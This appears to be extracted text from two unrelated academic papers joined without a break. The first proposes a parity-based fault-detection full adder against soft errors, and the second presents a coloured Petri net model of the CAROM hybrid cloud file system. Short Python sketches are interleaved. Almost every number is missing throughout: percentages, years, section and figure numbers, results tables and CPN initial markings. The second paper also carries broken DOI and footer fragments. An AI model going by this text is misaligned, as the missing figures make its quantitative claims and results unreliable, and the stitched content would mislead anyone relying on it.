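    # append the check bit so the stored word always has an even number of 1s
    return bits + [even_parity(bits)]

def check(word):
    *data, p = word
    return even_parity(data) == p      # False signals a single-bit error

w = store([1, 0, 1, 1])
assert check(w)                        # fault-free word passes the check
w[2] ^= 1                              # flip one bit (a soft error)
assert not check(w)                    # the flip is detected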
eccs, such as parity, add latency to each access and result in an appreciable performance penalty; moreover, they are difficult to implement for logic blocks [ , ]. nevertheless, combinational circuits are very important for fault-tolerant design, because new technologies exhibit a lower degree of electrical masking, and this phenomenon makes circuits more susceptible to faults [ ]. in [ ] it has been mentioned that from the year onward, the importance of improving fault coverage in combinational circuits will overtake that of sequential ones. for this reason, we chose this area for the implementation of our technique. fault-tolerance techniques are generally accomplished by using redundancy in hardware, software, time or information [ ]. in this paper, we use hardware redundancy in combinational circuits. one of the fault-tolerant hardware methods is duplication with comparison (dwc), in which the module is duplicated, the results are compared and, if a mismatch occurs, an error flag is raised. n-modular redundancy (nmr) design techniques add reliability to a system at the expense of extra hardware resources. in an nmr system, all protected modules must be replicated n times, in order to allow for automatic masking of n/ of the faults happening in separate modules. standard triple-module redundancy (tmr) methods are used frequently. in these methods, triple modules and voting circuits are implemented on an application-specific integrated circuit (asic) or a field-programmable gate array (fpga). when a fault occurs, the voting circuit neglects the value of the faulty module and takes the correct value of the other two non-faulty modules. these methods come with high area and power dissipation penalties and are inherently proposed for detecting or masking a single fault [ ]. this paper is organized as follows: section presents a brief background of fault sensitivity in combinational and sequential circuits; in section we propose a new fault-tolerance technique for combinational circuits; in section we apply this method to a full adder circuit; and finally, section concludes.

. background

a single event transient pulse is induced when a cosmic particle such as a neutron, or radiation from packaging materials such as an alpha particle, hits a sensitive region of the circuit with enough energy [ ]. the voltage pulse propagates through an activated path in the logic circuit. when it is captured by a clock edge, a soft error occurs; otherwise, the pulse is called a transient fault [ ]. in recent years, with advances in fabrication technology and transistor counts, processors have become increasingly vulnerable to transient faults [ ]. transient faults currently account for over % of faults in processor-based devices [ ]. in a typical integrated circuit, memory arrays, latch elements, and combinational logic are the most sensitive parts and can be affected by soft errors and transient faults. historically, soft errors were a concern in the design of memory elements, but the susceptibility of combinational blocks to transient faults increases as a side effect of technology scaling. combinational logic is usually used for designing arithmetic circuits (such as adders, multipliers, etc.), in other words the data path of a computer. the importance of employing combinational circuits in processing chips is rising, as they are simpler, operate faster, and consume less power than sequential ones.
moreover, many statistical studies support this statement [ , ]. combinational circuits occupy a considerable portion of processing chips in comparison with sequential circuits; for example, in fpgas, the ratio of combinational to sequential circuits varies between and times [ , ]. continuous device scaling, higher degrees of pipelining, and the decreasing electrical masking effect contribute to the increase in soft error rates in combinational circuits [ ]. transient faults in combinational circuits are catching up with errors in memory elements [ ]. a transient fault in a logic circuit might not be captured in a memory circuit, because it can be masked by one of the following three phenomena [ , , ]. first, logical masking occurs when a particle strikes a portion of the combinational logic that is blocked from affecting the output by a subsequent gate whose result is completely determined by its other input values. second, electrical masking occurs when the pulse resulting from a particle strike is attenuated by subsequent logic gates, due to the electrical properties of the gates, to the point that it does not affect the result of the circuit. third, latching-window masking occurs when the pulse resulting from a particle strike reaches a latch, but not at the clock transition where the latch captures its input value. these masking effects have been found to result in a significantly lower rate of soft errors in combinational logic compared to storage circuits in equivalent device technology [ ]. however, these effects could diminish significantly as feature sizes decrease and the number of stages in the processor pipeline increases. electrical masking could be reduced by device scaling because smaller transistors are faster and hence may have less attenuation effect on a pulse. also, deeper processor pipelines allow higher clock rates, meaning the latches in the processor will cycle more frequently, which may reduce latching-window masking. hence, in this work we focus on the occurrence of transient faults and soft errors in combinational logic circuits and suggest a logic-level fault-tolerant design method.

. new approach framework

in this paper we present a new approach to design fault-tolerant combinational circuits. assume a logic circuit with m input and n output lines, where each output is a logic function of the inputs. in this method, we use hardware redundancy to add a redundant output signal to the circuit. this new output generates the parity bit for the output set, and its value is derived directly from the input lines. there are two main types of parity checking in digital systems, odd parity (po) and even parity (pe); both can be used in our scheme, because parity checking is a relative method and it is sufficient that both sides agree on the convention used for data communication [ ]. if we model the input/output sides of a logic circuit as the transmitter/receiver stations of a telecommunication system, we can say that parity checking is a conventional method to check bit errors in telecommunication systems. in this technique, the transmitter station sends an extra bit accompanying the transmitted data bits, so that single bit errors that may occur on the channel can be detected after the data is received by the receiver station. in our scheme, we first calculate the truth table of the redundant output line as an even/odd parity over the output lines.
then we relate it to the input bit arrangements. after finding this function and simplifying it, we can implement it with the fewest logic gates needed. it is important that we do not use intermediate terms of the main circuit to build this redundant line: if intermediate terms were used, faults occurring before those branches would not appear on the output (i.e., on the redundant parity signal). if we use the even parity mechanism for designing the redundant output line, xoring this line with the other main circuit outputs reveals the occurrence of an error. we name the result of this xor gate the error signal. a zero on this line means that no error has occurred, and a one indicates an error in some part of the circuit. clearly, with the odd parity checking mechanism the xor gate becomes an xnor gate, but the outline of the overall method remains the same. the framework of this scheme is shown in fig. .

fig. : overall new approach framework

tmr is a conventional technique to design fault-tolerant circuits. it can mask a single fault by voting on the results, but if multiple faults occur in the modules, this method is unable to mask or detect them; as a result, incorrect outputs are voted and an error appears at the output of the circuit. hence, tmr performs poorly when facing multiple faults. replacing the conventional tmr modules with our proposed module helps to detect multiple faults by voting on the error signals in addition to the other output lines. it is worth emphasizing that our proposed approach is capable of detecting all single faults that may occur in the logic circuit, whether they lie in the main part of the circuit or not.

. a case study

alus are very important combinational circuit blocks that lie on the computational data path of processors. the reason for their importance is that they sit on the critical path: typically, a key point of delay propagation in processors is the maximum length of the path between source registers and destination registers [ ]. this length depends on the number of alu functional units (fus) that lie on this computational path. the critical path of a processor should be designed as a fault-tolerant path in order to increase reliability.

a. designing a fault-detection full adder (fdfa)

to show the effects of our approach in practice, we used an fdfa, an applicable logic circuit in alus. the fa is a simple logic circuit that is used as a basic element to design many functional units, such as adders, subtracters, multipliers, dividers, etc. all circuits in our experiments are custom designed and laid out in . v, . µm cmos technology and simulated using the hspice tool. this circuit uses a redundant part to provide an even parity for the outputs sum and cout, which is named e. e is a logic function of the fa input lines, named a, b and cin. the value of this output line is selected in such a way that the number of bits in the three output lines is always even. table i shows the truth table of the fdfa.

table i: truth table of fdfa (inputs a, b, cin; outputs sum, cout, e)

after deriving the value of the e line for all input arrangements, equation ( ) simply results. this equation shows that in order to implement the e line, three nands and three nots are needed in total. in the next stage, we design this circuit with the above gates. the derived gate-level design of the fdfa is shown in fig. .

figure : gate-level fdfa
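to make the relation between the outputs and the parity line concrete, the following python sketch models the fdfa behaviourally, assuming e is the even-parity bit of sum and cout (so that sum, cout and e always contain an even number of ones); the function names and the injected stuck-at fault are illustrative and do not reproduce the gate- or transistor-level design of the paper.

def full_adder(a, b, cin):
    s = a ^ b ^ cin
    cout = (a & b) | (a & cin) | (b & cin)
    return s, cout

def parity_output(a, b, cin):
    # in hardware, e is produced by a separate gate network fed only by
    # a, b and cin; here we simply recompute it behaviourally
    s, cout = full_adder(a, b, cin)
    return s ^ cout

def error_signal(s, cout, e):
    # xor of the three output lines: 1 signals a detected fault
    return s ^ cout ^ e

# exhaustive check over all input combinations
for a in (0, 1):
    for b in (0, 1):
        for cin in (0, 1):
            s, cout = full_adder(a, b, cin)
            e = parity_output(a, b, cin)
            assert error_signal(s, cout, e) == 0        # fault-free: no alarm
            if s != 1:                                   # force a stuck-at-1 fault on sum
                assert error_signal(1, cout, e) == 1     # the fault is detected

in the sketch, the error signal stays at zero for fault-free operation and rises to one whenever a single output line flips, which is the single-fault detection property claimed for the fdfa.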
after that, we sketch the layout of this circuit in the l-edit tool and obtain the waveforms of fdfa operation for some experimental inputs. fig. shows these waveforms for all input and output lines.

figure : fdfa waveforms

b. implementation results

we evaluated the hardware and timing overheads of using the fdfa in comparison with the nfa. next, after adding a xor gate to the fdfa (giving the xfdfa), the calculated overheads were compared with the dwc method built from nfa modules. table ii shows the area, propagation delay and dynamic power consumption overheads. the area overhead is about %, which is the result of the additional transistors in the fdfa design. regarding propagation delay, which is a very important factor in evaluating circuit specifications, both schemes are similar, because the worst-case delay is limited by the path that generates the sum signal. in table iii, we compare the xfdfa with dwc, because both of them are capable of detecting a single fault.

table ii: nfa vs. fdfa (rows: nfa, fdfa, overhead; metrics: layout area, number of transistors, delay, power (fwt))

table iii: dwc vs. xfdfa (rows: dwc, xfdfa, improvement; metrics: layout area, number of transistors, delay, power (fwt))

in order to implement dwc, we use two coupled nfas whose corresponding outputs are xored together to check the results. our xfdfa is designed with fewer transistors than dwc and can save almost % in dynamic power consumption, because the redundant component in dwc is larger than in the xfdfa. in delay, however, we are penalized by about %; the reason for this penalty is the two-level xor in the final stage of the xfdfa. if we examine the arrangement of gates in each circuit at the logic level, we find that both methods use a -level combinational circuit on their output side, but the last gate in dwc (an or gate) is quicker than the last gate of the xfdfa (a xor gate).

. conclusions

in this paper, we proposed a new approach to design fault-tolerant combinational circuits. the main idea behind the proposed approach is a redundant circuit that operates as an even parity generator for the main output lines. we also showed that traditional methods such as tmr can detect multiple faults in addition to single faults if they are combined with the proposed method. experimental results obtained from testing the proposed approach on a full adder circuit exhibit about . % overhead in area and % penalty in power consumption, which shows about . % improvement in area and % in power over the traditional dwc method. from the propagation delay point of view, this method performs almost equally to dwc.

references

[ ] j. srinivasan, s. v. adve, p. bose, and j. a. rivers, "the impact of technology scaling on lifetime reliability," presented at the int. conf. dependable systems and networks, june .
[ ] k. mohanram and n. a. touba, "cost-effective approach for reducing soft error failure rate in logic circuits," presented at the itc. conf. international test conference, , pp. .
[ ] p. shivakumar, m. kistler, s. w. keckler, d. burger, and l. alvisi, "modeling the effect of technology trends on the soft error rate of combinational logic," presented at the dsn. conf. proceedings of international conference on dependable systems and networks, june , p. – .
[ ] s. borkar, t. karnik, s. narendra, j. tschanz, a. keshavarzi, and d. vivek, "parameter variations and impact on circuits and microarchitecture," presented at the conf. design automation, june .
[ ] k. constantinides, s. plaza, j. blome, b. zhang, v. bertacco, s.
mahlke, t. austin, and m. orshansky, "bulletproof: a defect-tolerant cmp switch architecture," presented at the int. conf. symposium on high performance computer architecture, february .
[ ] v. narayanan and y. xie, "reliability concerns in embedded system designs," presented at the conf. ieee computer society, jan , ( ): – .
[ ] d. t. franco, j. f. naviner, and l. naviner, "yield and reliability issues in nanoelectronic technologies," presented at the ann. conf. telecommunication, , ( – ): – .
[ ] j. f. zielger and h. puchner, "ser-history, trends and challenges," presented at the conf. cypress semiconductor corporation, .
[ ] v. stojanovic, "a cost-effective implementation of an ecc-protected instruction queue for out-of-order microprocessors," presented at the dac. conf., .
[ ] s. mukherajee, "architectural design for soft errors," in morgan kaufmann publishers, .
[ ] b. johnson, "design and analysis of fault-tolerant digital systems," in addison wesley reading ma, .
[ ] j. a. blome, s. gupta, s. feng, and s. mahlke, "cost-efficient soft error protection for embedded microprocessors," in cases, , pp. – .
[ ] s. mukherjee, j. emer, and s. reinhardt, "the soft-error problem: an architectural perspective," presented at the hpca- conf. th int. symp. high performance computer architecture, .
[ ] r. k. dyeriyer and d. j. rossetti, "a measurement-based model for workload dependence of cpu errors," presented at the ieee trans. comp., vol. c- , pp. - , june .
[ ] z. a. obaid, n. sulaiman, and m. n. hamidon, "developed method of fpga-based fuzzy logic controller design with the aid of conventional pid algorithm," presented at the australian journal of basic and applied sciences, , ( ): - .
[ ] k. perkuszewski, k. t. pozniak, w. jalmuna, w. koprek, j. szewinski, and r. s. romaniuk, "fpga based multichannel optical concentrator simcon . ," presented at the tesla cavities llrf control system, deutsche elektronen-synchrotron (desy), germany, .
[ ] t. siriwan and p. nilagupta, "hpgast: high performance ga-based sequential circuits test generation on beowulf pc-cluster," presented at the conf. pahonyothin rd. lardyao jatujak bangkok thailand, .
[ ] f. kocan and d. g. saab, "dynamic fault diagnosis of combinational and sequential circuits on reconfigurable hardware," presented at the journal of electron test, springer science, september , : – .
[ ] m. p. baze and s. p. buchner, "attenuation of single event induced pulses in cmos combinational logic," presented at the ieee trans. on nuclear science, vol. , no. , pp. – , december .
[ ] p. liden, p. dahlgren, r. johansson, and j. karlsson, "on latching probability of particle induced transient in combinatorial networks," presented at the th symposium on fault-tolerant computing (ftcs), pp. – , june .
[ ] m. d. chinn, "survey based expectations and uncovered interest rate parity," university of wisconsin, madison and nber, october .
[ ] a. saberkari, a. afzalikosha, and s. b. shokouhi, "a new low voltage and low power cmos one bit full-adder using gdi technique," presented at the th iranian conference on electrical engineering (icee), amirkabir university, tehran, iran, may .

petri net based modeling and analysis for improved resource utilization in cloud computing

muhammad rizwan ali , farooq ahmad , muhammad hasanain chaudary , zuhaib ashfaq khan , mohammed a.
alqahtani , jehad saad alqurni , zahid ullah and wasim ullah khan
department of computer science, western norway university of applied sciences, bergen, norway
department of computer science, comsats university islamabad, lahore campus, lahore, pakistan
department of electrical & computer engineering, comsats university islamabad, attock campus, attock, pakistan
department of computer information systems, college of computer science and information technology, imam abdulrahman bin faisal university, dammam, saudi arabia
department of educational technology, college of education, imam abdulrahman bin faisal university, dammam, saudi arabia
department of information systems, faculty of computing and information technology, king abdulaziz university, jeddah, saudi arabia
school of electrical engineering and automation, wuhan university, wuhan, china

abstract

the cloud is a shared pool of systems that provides multiple resources through the internet; users can access a lot of computing power from their own computer. however, with the strong migration rate of applications towards the cloud, more disks and servers are required to store the huge volume of data. most cloud storage service providers replicate full copies of data over multiple data centers to ensure data availability. such replication is not only a costly process but also a waste of energy resources. erasure codes reduce the storage cost by splitting data into n chunks and storing these chunks on n + k different data centers, to tolerate k failures; however, they also incur extra computation cost to regenerate the data object. cache-a replica on modification (carom) is a hybrid file system that combines the benefits of both replication and erasure codes to reduce access latency and bandwidth consumption. however, in the literature, no formal analysis of carom is available to validate its performance. to address this issue, this research first presents a colored petri net based formal model of carom, and then presents a formal analysis and simulation to validate the performance of the proposed system. this paper contributes towards the utilization of resources in clouds by presenting a comprehensive formal analysis of carom.

subjects algorithms and analysis of algorithms, computer education, data science
keywords cloud computing, replication, colored petri net, formal analysis

introduction

cloud computing is an emerging paradigm of information technology that provides universal access to shared pools of system resources through the internet. the resources can be provided on demand, on a pay-per-use basis, or in the
form of a subscription. with the growth of internet access, cloud computing is spreading through industry, academia, and society. due to the large number of resources, the cloud uses virtualization for resource management. further, clouds need to stimulate data centers' design so that data can be readily available to users anywhere in the world (buyya et al., ).

services

there are four different service models in cloud computing.

software as a service
software as a service (saas) is a multi-tenant platform that enables cloud users to deploy their applications to the hosting environment. further, it supports different cloud applications in a single logical environment to achieve optimization in terms of speed, security, availability, scalability, and economy (dillon, wu & chang, ).

platform as a service
platform as a service (paas) facilitates the cloud user in organizing, developing and managing various applications through a complete "software development lifecycle". further, it also eliminates the need for an organization to build and maintain the infrastructure traditionally required to develop applications (sajid & raza, ). using saas, cloud users can host different applications, while paas offers a platform to develop different applications (dillon, wu & chang, ; sajid & raza, ).

infrastructure as a service
infrastructure as a service (iaas) offers direct access to resources such as storage, compute, and network resources used for processing (dillon, wu & chang, ). iaas sets up an independent virtual machine (vm) to transform the architecture of the application so that multiple copies can be executed on a single machine. moreover, it provides access to the infrastructure and delivers additional storage for the network bandwidth of corporate web servers and for data backups. an important feature of iaas is that extensive computing power can be switched on, which previously was accessible only to people with high-power computing facilities.

database as a service
database as a service (daas) is a self-service cloud computing model. in daas, users request database services and access to the resources. daas provides a shared, consolidated platform to deliver database services on a self-service model (mateljan, Čišić & ogrizović, ).

deployment models

based on environmental parameters including openness, storage capacity and proprietorship of the deployment infrastructure, one can choose a deployment model from the types of cloud deployment given below.

public cloud
generally, public clouds may be owned and managed by academic or government organizations and are used by common users and the public. in the traditional sense, public cloud resources are delivered dynamically, on a self-service basis over the internet, by an external supplier who shares the resources (ahmed et al., ). security issues occur in such clouds, which are more prone to attack; this is why users access the public cloud only with proper validation (sajid & raza, ).

private cloud
such an infrastructure works only for a specific organization, while an off-premise private cloud is used by one company and the infrastructure is implemented by another company (ahmed et al., ).
in a private cloud there are no restrictions of network bandwidth, no security risks, and no legal requirements, and data is managed within the organization, which is not possible in a public cloud (kamboj & ghumman, ).

hybrid cloud
a hybrid cloud is a combination of two or more separate cloud infrastructures (public or private) that together form another type of cloud. this concept is also known as cloud bursting, where several integrated cloud infrastructures remain unique entities (mell & grance, ). a hybrid cloud allows organizations to shift overflow traffic to the public cloud to prevent service interruption.

federated cloud
to handle site failures, cloud infrastructure providers have established data centers at different geographic locations to ensure reliability. however, this approach has shortcomings: one problem is that cloud users may find it difficult to know which remote location is best for hosting their application. cloud service providers have a finite capacity, and it is difficult for a single cloud infrastructure provider to set up data centers at many different geographic locations. this is why different providers of cloud services come under one umbrella and form a federated cloud (varghese & buyya, ). in times of work overload, cloud federation offers the opportunity to use the available, cost-effective, on-demand, and reliable computational and storage options of other cloud service providers (buyya, ranjan & calheiros, ). for example, the eu-based egi federated cloud shares data centers among cloud providers.

issues

current data centers host multiple applications with time latencies ranging from a few seconds to multiple hours (patterson, ). the main focus of cloud computing is to provide a performance guarantee and to take care of data privacy. with the high growth rate of data on the cloud, the need for more massive servers is rising day by day. the demand for higher performance is being met by replicating data in multiple data centers worldwide without regard for energy consumption. on average, every data center utilizes as much energy as , households. data centers are costly and unfavorable for the environment, as they emit more carbon than both argentina and the netherlands (patterson, ).

need for cache-a replica on modification

cache-a replica on modification (carom) is a hybrid cloud file system that merges the benefits of both replication and erasure codes. figure reflects the process flow of carom. carom has a cache at each data center; the cache serves local accesses, and every data center acts as a primary data center. data objects that are frequently accessed are stored in the cache to avoid the extra computational cost. in contrast, objects that are accessed rarely are divided into m data chunks, which are distributed among n + k data nodes to tolerate k failures, keeping the storage cost to a minimum and making the data center environmentally friendly (ma et al., ).

contribution of research

formal methods are mathematical methods used to model or specify a system. petri nets provide strong mathematical and graphical representations to incorporate concurrency, sequential execution, conflicts, determinism, resource sharing, timing information, communication, synchronization, and distribution in the underlying system.
this paper's primary goal is to develop a data scheduling model based on colored petri nets (cpn) that utilizes carom to reduce storage cost and bandwidth latency. statistical analysis is provided to elucidate the performance of the model, and simulation and verification of the proposed model are also presented. the rest of the article is organized as follows: "related work" presents related work. "colored petri nets" presents basic terminology, notation, and graphical conventions for petri nets. "formal model of carom" presents the formal modeling of the carom based data scheduling framework. "simulation" presents a formal analysis of the developed model. "analysis" presents the simulations, their results, and the discussion of them. "conclusion" concludes our work and gives final thoughts about the strengths and weaknesses of our approach.

figure : carom process flow

related work

in the cloud, resource scheduling is a challenging field (mathew, sekaran & jose, ), and substantial work has been done on resource scheduling in the cloud. some approaches focus on optimizing time performance, such as completion time, total delay, and response time (mathew, sekaran & jose, ). zhan et al. ( ) provide a detailed survey of cloud computing. an ant colony optimization algorithm for scheduling tasks according to budget is presented in zuo et al. ( ). in adil et al. ( ), a heuristic algorithm is proposed for task scheduling. kumar & verma ( ) present a genetic algorithm to schedule independent tasks. in mateescu, gentzsch & ribbens ( ), another genetic algorithm is presented that improves the makespan of resources. the authors of de assunção, di costanzo & buyya ( ) propose an architecture that provides a platform for scientific, high-performance (hpc) applications; the cornerstone of the proposed architecture is the elastic cluster, which expands into the hybrid cloud environment (de assunção, di costanzo & buyya, ). researchers in mastelic et al. ( ) analyzed the trade-off between performance and usage costs of various provisioning algorithms that use cloud resources to expand cluster capacity. the authors in javadi, abawajy & buyya ( ) propose non-disruptive resource provisioning policies for hybrid cloud environments, which they evaluate using a model-based simulation instead of a real case-study performance evaluation. researchers in mattess, vecchiola & buyya ( ) present a provisioning algorithm for expanding cluster capacity with amazon ec spot instances. research work in yuan et al. ( ) provides a profit maximization model for private cloud providers using the temporal variation of prices in a hybrid cloud, although, like many others, they consider time while treating data and network costs as negligible. however, all the algorithms in the literature were limited to static resources only. with the revolution of cloud computing, the number of data servers is increasing across the world, and the construction of data centers is not only costly but also unfavorable to the environment. much focus is therefore given to energy-optimized resource scheduling in cloud computing. an energy-aware model in the form of directed acyclic graphs has been proposed in gan, huang & gao ( ).
in zhao et al. ( ), two fitness functions are defined: job completion time and energy. shen et al. ( ) proposed a resource allocation technique that allocates resources to virtual machines while taking care of energy. a dvfs method is presented in hosseinimotlagh, khunjush & samadzadeh ( ), which schedules a single task and takes care of the voltage supply. wu, chang & chan ( ) present a virtual machine scheduling algorithm that achieves energy optimization and reduces host temperature. in mhedheb et al. ( ), a method is presented to reduce both network and server power. research work in xia et al. ( ) scales the voltage to reduce energy costs. scaled processor utilization and resource consolidation are presented in lee & zomaya ( ) for energy optimization. all these methods focus on reducing the cost of energy without caring about job completion time. in beloglazov, abawajy & buyya ( ), the researchers propose energy-aware mapping of vms to cloud servers as a bin-packing problem, independent of the types of workload. klein et al. ( ) present a brownout framework for energy optimization. on a cloud file system, all users have to bear either time latency or cost.

colored petri nets

petri nets are bipartite directed graphs that support behavioral analysis of the modeled system. cpn is a mathematical technique used for modeling parallel systems and for graphical analysis of their characteristics (jensen, ; milner, ; ullman, ). cpn is the combination of petri nets and standard ml (emerson & sistla, ; virendra et al., ). cpn allows defining user-defined data types along with some standard declarations. it is a general-purpose modeling language and has the power to model parallel systems and analyze their performance. the formal definition of cpn is presented below (jensen & kristensen, ): a net is a tuple n = (p, t, a, Σ, c, n, e, g, i) where:
p is a set of places.
t is a set of transitions.
a is a set of arcs such that p ∩ t = p ∩ a = t ∩ a = Ø.
Σ is a set of color sets.
c is a color function, that is, c: p → Σ.
n is a node function. it maps a into (p × t) ∪ (t × p).
e is an arc expression function. it maps each arc a ∈ a into the expression e.
g is a guard function. it maps each transition t ∈ t to a guard expression g. the output of the guard expression should evaluate to a boolean value: true or false.
i is an initialization function. it maps each place p into an initialization expression i.
each place in a cpn is mapped to a multiset of tokens through a mapping function called a marking. the initial marking reflects the initial state of a model, and the final marking represents the final state of the system.

formal model of carom

for modeling, the high-level architecture and the components of the system are identified in the first phase. after that, the interaction points of the identified components are defined for a smooth implementation of the component-based architecture. further, a mixture of top-down and bottom-up approaches is adopted in this paper to model the framework. carom uses part of the local storage disk as a cache. whenever a write request for a new file is received, the complete file is stored in the reserved memory of each dc, named the cache. whenever the cache is nearly full, the least recently used file is removed from the cache; it is divided into n chunks and distributed over n + k data nodes.
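as a rough illustration of this write path and of the read path described next, the following python sketch mimics the carom behaviour at a single data center; it abstracts real erasure coding to a plain split of the data into n chunks placed on n + k nodes, and the class and method names (caromdatacenter, write, read) are illustrative assumptions, not part of the paper's cpn model.

class CaromDataCenter:
    def __init__(self, n=3, k=1, cache_capacity=2):
        self.n, self.k = n, k
        self.cache = {}                                 # key -> (data, life counter)
        self.cache_capacity = cache_capacity
        self.nodes = [dict() for _ in range(n + k)]     # n + k chunk stores

    def write(self, key, data):
        if len(self.cache) >= self.cache_capacity:      # cache nearly full: evict
            victim = min(self.cache, key=lambda x: self.cache[x][1])
            self._split_and_distribute(victim, self.cache.pop(victim)[0])
        self.cache[key] = (data, 0)

    def _split_and_distribute(self, key, data):
        step = max(1, -(-len(data) // self.n))          # ceiling division
        chunks = [data[i:i + step] for i in range(0, len(data), step)]
        for i, chunk in enumerate(chunks):              # chunk i stored on node i
            self.nodes[i][key] = (i, chunk)

    def read(self, key):
        if key in self.cache:                           # cache hit: no rebuild cost
            data, life = self.cache[key]
            self.cache[key] = (data, life + 1)
            return data
        pieces = sorted(node[key] for node in self.nodes if key in node)
        return "".join(chunk for _, chunk in pieces)    # regenerate from chunks

dc = CaromDataCenter()
dc.write("f1", "coloured")
dc.write("f2", "petri")
dc.write("f3", "nets")         # evicts the least-used object to the data nodes
print(dc.read("f1"), dc.read("f2"), dc.read("f3"))

running the snippet prints all three objects back, the first one rebuilt from its chunks after eviction and the other two served directly from the cache.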
however, suppose a read request for a file is received. in that case, it is checked first in the nearest dc. if it is found, then it is downloaded directly, without any computational rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cost. whenever a request of that file is received that is not available in the cache. data is regenerated from n data nodes out of n + k (ma et al., ). the strategy discussed above is presented in the form of a flow chart (see fig. ). hierarchical view of model figure depicts the hierarchical view of the model. figure file access process flow of carom. full-size doi: . /peerj-cs. /fig- figure hierarchical view of the model. full-size doi: . /peerj-cs. /fig- rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ colored petri nets model in order to model the carom based framework using cpn, the components sender, data center, and receiver are developed. the data center component is further extended to cache and datanode sub-components, as shown in fig. . table represents the color sets used in the model. as data types, the color sets are mapped to the places of the model given in fig. . for instance, color set no, in the third row of table , is mapped to the place key while color set data, in the fourth row of table , is mapped to the place next_key in the cpn model shown in fig. . moreover, product type color sets are constructed by taking the cartesian product of the color sets. for instance, the color set request in table is constructed using color sets no, data, op and no. table represents the list of variables used in the model. a variable v is used in the arc inscription, and type[v] ∈ Σ, to fetch the data from the place. further, the variables construct arc expression, which is assigned to arc a through arc expression function figure top level view of proposed scheme. full-size doi: . /peerj-cs. /fig- rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ e: a→exprv while type[e(a)] = c(p)ms where expr is the set of expressions and ms is a multiset. a marking is a function m that maps each place p ∈ p into a multiset of tokens, that is, m(p) ∈ c(p)ms. table shows values (tokens) to represent the initial marking. arc expressions are evaluated by assigning the values to the variables in the expressions. table color sets of the model. color set defination colset unit = unit; unit color set colset bool = bool; boolean color set colset toa = int; closet no = int; integer color sets colset data = string timed; timed string color set colset op = string timed; timed string color set colset request = product no × data × op × no timed; timed product of color set no of type int, color set data of type string, color set op of type string and color set no of type int. colset file= product no × data × toa timed; timed product of color set no of type int, color set data of type string and color set toa of type int. colset nd=product no × data timed; timed product of color set no of type int and color set data of type string. colset rr=product no × no timed; timed product of color set no of type int and color set no of type int. colset rrl=list rr timed; timed list of color set rr. 
colset nkd=product no × no × data; product of color set no of type int, color set no of type int and color set data of type string. colset recdata = list nkd timed; timed list of color set nkd. colset packet = union data:nkd timed ; union of type data(int*int*string), colset senddata= product no × no × data timed; timed product of color set no of type int, color set no of type int and color set data of type string. colset sendlist=list senddata timed; timed list of color set senddata. colset cache = product no × data × no timed; timed product of color set no of type int, color set data of type string and color set no of type int. colset cachelist = list cache timed; timed list of color set cache. colset cachehit= product no × cachelist timed; timed product of a color set no of type int and color set cachehit of type list. colset rcvsplit = product no × packet; product of color set no of type int and color set packet of type union. colset packet=list packet timed; timed list of color set packet of type union. table variables of the model. variable defination var p:packet; variables of colour set packet. var pak:packet; variable of colour set packet. var d,data,next:data; variables of colour set data. var n,n ,id,k,k ,x ,x ,x :no; variables of colour set no. var cl:cachelist; variables of colour set cachelist. var sl:sendlist; variable of colour set sendlist. var c:cache; variable of colour set cache. var rd,sd:recdata; variables of colour set recdata. var req,e:request; variables of colour set request. rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ further, expressions can be converted into functions to be mapped to arcs. table represents the functions used in this model. main module we first identified high-level components of the system, and then each component is step-wise refined. for such a purpose, hierarchical colored petri nets are appropriate formalism to make the model more straightforward and understandable. figure depicts the top-level view of the model. this is a hierarchical model in which multiple substitution transitions connect with places. a substitution transition has its own definition. therefore, groups are identified from the detailed petri net model and converted into substitution transitions. there are twenty places and ten transitions, including seven substitution transitions, named cache, store-db, db , db , db , regenerate-data and receiver. cache module this module aims to decide whether the data will be directly available from cache or reconstruct it from n different data centers. figure shows the cpn cache module, and it has ten places and four transitions. two places are in-sockets and six are out-sockets. whenever a token is added in the place “check cache” with operation value “read”, it is sent to transition “cache checked”, which also receives a “cachelist” from the place “cache”. function member is a boolean function. it returns true if the key of token coming from the place “check cache” is found from cachelist (see table for all declared functions). if member function returns true, then the function retrieve will get the data against key from the cache. further, the function sends data to place “cache hit” and restores that data object in the cache. in contrast, function updatelife will increment the value of the life of this object by . on the other side, if the function member returns false, then the key is sent to all available data centers through “cachemiss”. 
whenever a token is reached in place “send to cache” with operation value “write”, it causes enabling of the transition “store_in_cache” which can only be fired when the cache is not full. moreover, if the cache is not full and no data object is found with the same key, then token is sent to place “cache” and inserted on the head of the cachelist. however, if the cache is full, then the token waits in place “send to cache” until the function sort arranges the cachelist with respect to life of data objects. further, the data object having the least life is removed from cache, and it is sent to place “split & distribute”. if the table initializations of the model. initial marking val db = `[data( , ,"c"),data( , ,"o"),data( , ,"e"),data( , ,"p")]@ ; val db = `[data( , ,"o"), data( , ,"u"),data( , ,"d"),data( , ,"e")]@ ; val db = `[data( , ,"l"),data( , ,"r"),data( , ," "), data( , ,"t")]@ ; val allrequest= `( ,"col","write", )@ +++ `( ,"our","write", )@ +++ `( ,"ed ","write", )@ +++ `( ," ","read", )@ +++ `( ," ","read", ) @ +++ `( ,"pet","write", )@ +++ `( ,"ri ","write", )@ +++ `( ," ","read", )@ ; rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table functions of the model. function purpose fun check(n,k) = if(n>k) then n else k; enable transition if first token has greater value fun wait() = discrete( , ); wait for a random time unit between and fun check (n,k) = if n=k then k+ else k; increment if both tokens have same value fun success() = discrete( , )<= ; to check either random number is less than fun success (n,d) = if success() then `(n,d) else empty; enable transition if random number is less than fun success (k) = if success() then `k else empty; enable transition if random number is less than fun transmit(n,k,d) = if n=k then `d else empty; enable transition if both tokens have same value fun transmit (n,k) = if n>k then `k else empty; enable transition if first token has greater value fun read(req:request) = if # (req)="read" then `(# (req)) else empty; enable transition with st argument of request if rd argument of request is “read” fun write(req:request)= if # (req)="write" then `req else empty; enable transition with whole request if rd argument of request is “write” fun length [] = | length ( h :: t ) = +length t; 